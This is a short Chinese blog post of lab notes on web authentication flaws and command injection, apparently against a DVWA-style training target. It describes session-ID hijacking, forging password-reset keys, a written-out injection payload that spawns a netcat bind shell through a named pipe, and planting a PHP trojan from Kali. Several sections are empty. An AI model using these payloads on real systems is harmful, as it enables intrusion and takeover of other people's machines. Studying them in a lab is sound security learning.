web身份认证漏洞

Session ID的利用:

截取目标session ID利用firefox浏览器的tools > cookies manager功能导入

IE获取session ID方法:F12开发人员工具>缓存

 

找回密码理想实验:

https://www.example.com/reset?email=user@example.com&key=b4c9a289323b21a01c3e940f150eb9b8c542587f1abfd8f0e1cc1ffc5e475514

通过密码学相关找到邮箱和key的关系,由任意邮箱得出key,即可完成更改密码。


命令执行漏洞:


Low安全级别:


Medium安全级别:


对&&  ;进行过滤利用方法:

High安全级别:


(无明显漏洞)


漏洞利用:

1. ;mkfifo /tmp/pipe;sh /tmp/pipe | nc -nlp 4444 > /tmp/pipe



2.在kali准备好PHP木马

在kali启动apache服务

侦听1234端口

攻击

获取到kali的shell,由此可得肉鸡利用方法:




  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值